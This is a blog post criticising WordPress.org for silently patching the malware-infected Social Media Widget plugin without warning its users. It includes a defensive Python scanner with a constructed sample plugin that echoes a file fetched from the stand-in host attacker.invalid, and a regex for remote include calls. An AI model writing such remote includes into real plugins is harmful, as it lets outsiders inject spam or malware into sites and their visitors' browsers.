Have you ever logged in to your WordPress dashboard, noticed that there were some updates pending, but simply couldn’t be bothered pushing the button to run them? Sure you have. Who hasn’t? A good majority of my work comes from dehacking websites that have been compromised, and even I slack on that from time to time. I mean, if there are no security bulletins about the updates, and I am only using plugins I have downloaded directly from WordPress.org I should be fine, right?
Wrong.
The day before yesterday I rebuilt a client’s site that had been hacked, grabbing fresh versions of all of the plugins he was using. I noticed that one of the plugins, Social Media Widget, didn’t download though, and when I went to investigate why I saw that it had been yanked from the WordPress repositories. Checking Google’s cache I could tell that it had only recently been removed, that the old download button still worked, and that there were no warnings or messages as to why it was pulled anywhere I looked. I went ahead and grabbed a fresh copy, then posted on the support forums (which also gave no clues as to why it was gone) asking what was up with it:
http://wordpress.org/support/topic/anyone-know-why-social-media-widget-was-removed
A few hours later I got my answer: the plugin was infected with malware, so they had removed the plugin page altogether. According to Samuel Wood (Otto), one of the WordPress devs, they “forced an update” of the plugin to a version that they fixed:
Two things struck me as wrong about this. First, WordPress cannot “force” an update of a plugin onto the users themselves, so Otto’s claim was misleading at best. They can only update the svn, which then lets the user know that there is an update available (assuming that they log in to their dashboard, of course). If the users do not see the update, or do not have reason to believe that there is an urgent reason to run it, then the infected version will remain on their installations until they do. To give you an idea of how ineffectual that tactic is when it is the only thing protecting the infected blogs, here is a screenshot of the distribution of the various active versions of the plugin from back on March 28th:
This shows that less than 10% of the almost 1 million users had upgraded to the most recent version of the plugin, which had been out for a month when this data was collected.
Second, why is it that until I actually posted this question, no word about this infected plugin was mentioned by WordPress? There was nothing on the WordPress.org blog, nothing on Twitter from any of the developers, nothing on the plugin’s support forum, and of course, aside from letting me know that there was an update, nothing in the WordPress dashboard, not even when I clicked on the “View version 4.0.1 details” link in my plugins screen:
In fact, the only place you will see any information related to this malware is if you run the update, navigate to the folder for the plugin, open the readme.txt in there, and scroll down to line 181:
== Changelog ==
= 4.0.1 =
* Remove potentially malicious code.
And that’s the extent of what WordPress feels is necessary to warn its users that an exploited plugin was distributed from the official plugin repositories. This isn’t one of those obscure, rarely used plugins, either. Before being yanked this plugin had been downloaded 940,776 times. At the time of writing, the remote file that was being included by the plugin merely contained some spam, and associated JavaScript to hide the spam from normal view, but since the remote file itself is under the control of someone who obviously is not brimming over with moral fortitude, there is nothing saying that they couldn’t decide just as easily to swap the file out for something that spreads viruses. In such a case everyone still unaware that they are hosting an infected plugin would suddenly be serving viruses to their audience. If you ask me, the fact that there is a chance that could happen should be enough to put out a tad bit more of an alert than a single line in a readme.txt that the majority of people will never read. WordPress, however, doesn’t seem to feel that way.
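If you manage more than one site and can’t tell from the dashboard which installs are still on the old version, or whether a plugin is pulling anything in from a remote server, a quick local check beats waiting for the update notice. The following scanner is an added example written for this post; it is not the plugin’s code nor anything from WordPress.org. It reads the Version: header from a plugin’s PHP files and flags PHP statements that include or fetch an http(s) URL. The two sample plugin files it scans are constructed for the example (the hostname attacker.invalid is made up) and do not reproduce the real Social Media Widget code.

```python
"""Added example (not from the original post or the plugin): report a
WordPress plugin's declared version and flag PHP calls that include or
fetch content from a remote URL at runtime.  The sample plugins below are
constructed for this example and are not the real Social Media Widget."""
import re
import tempfile
from pathlib import Path

# include/require of an http(s) URL, or a remote fetch via
# file_get_contents/fopen/curl_init pointed at a URL literal.
REMOTE_CALL = re.compile(
    r"\b(include|include_once|require|require_once|"
    r"file_get_contents|fopen|curl_init)"
    r"\s*\(?\s*(['\"])\s*(https?://[^'\"]+)\2",
    re.IGNORECASE,
)
# The "Version:" line of a standard WordPress plugin header comment.
VERSION_HEADER = re.compile(r"^\s*\*?\s*Version:\s*(\S+)", re.MULTILINE)


def plugin_version(plugin_dir):
    """Return the Version: header from the first top-level PHP file that has one."""
    for php in sorted(Path(plugin_dir).glob("*.php")):
        m = VERSION_HEADER.search(php.read_text(errors="replace"))
        if m:
            return m.group(1)
    return None


def find_remote_includes(plugin_dir):
    """Return (relative path, line number, url) for each remote include/fetch."""
    hits = []
    for php in sorted(Path(plugin_dir).rglob("*.php")):
        text = php.read_text(errors="replace")
        for lineno, line in enumerate(text.splitlines(), 1):
            for m in REMOTE_CALL.finditer(line):
                hits.append((str(php.relative_to(plugin_dir)), lineno, m.group(3)))
    return hits


# Constructed sample plugins (not real code): one clean, one that echoes an
# attacker-controlled file on every page load.
CLEAN_PLUGIN = """<?php
/*
Plugin Name: Example Widget
Version: 4.0.1
*/
function example_widget_footer() {
    echo '<p>Example widget</p>';
}
"""

INFECTED_PLUGIN = """<?php
/*
Plugin Name: Example Widget
Version: 4.0.0
*/
function example_widget_footer() {
    // content pulled from a server the plugin author does not control
    echo file_get_contents('http://attacker.invalid/spam.txt');
}
"""


def demo(source):
    """Write a constructed one-file plugin to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as d:
        Path(d, "example-widget.php").write_text(source)
        return plugin_version(d), find_remote_includes(d)


if __name__ == "__main__":
    for label, src in (("clean", CLEAN_PLUGIN), ("infected", INFECTED_PLUGIN)):
        version, hits = demo(src)
        print(f"{label}: version {version}, remote includes: {hits or 'none'}")
```

Point `plugin_version` and `find_remote_includes` at `wp-content/plugins/<slug>` on each site you look after. This is a heuristic, not a malware scanner: it only catches URL literals passed straight to the listed functions, so code that builds the URL at runtime, hides it behind base64_decode, or uses WordPress’s own HTTP API (which legitimate plugins use for update checks) will not show up. Treat a hit as a reason to read the file, not as proof of infection.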
Even more disconcerting is what I found out a little bit after that. Once I got my answer in the thread I opened, Sucuri blogged about it, and Samuel left a few comments there as well, where he used the phrase “Normally in these cases” when referring to this incident:
This tells me that, regardless of how rarely it happens, it appears to be WordPress’s policy that when an infected or compromised plugin makes its way into the repositories they quietly clean it up without any fanfare. Oftentimes, unfortunately, this would be like closing the proverbial barn door after the horses got out, and stronger measures may be necessary (up to and including rebuilding the whole installation in some cases). The WordPress plugin repositories are supposed to be a trusted source. Not being more forthcoming when something like this happens borders on negligence, to put it bluntly.
I understand that in years past WordPress had quite a reputation as a security risk, and that there is a certain amount of bad press associated with being upfront about incidents such as this. However, I hope that WordPress will eventually decide that potential public safety risks outweigh not wanting to look bad, will do the right thing, and will change their policies about publicly letting people know when these things happen.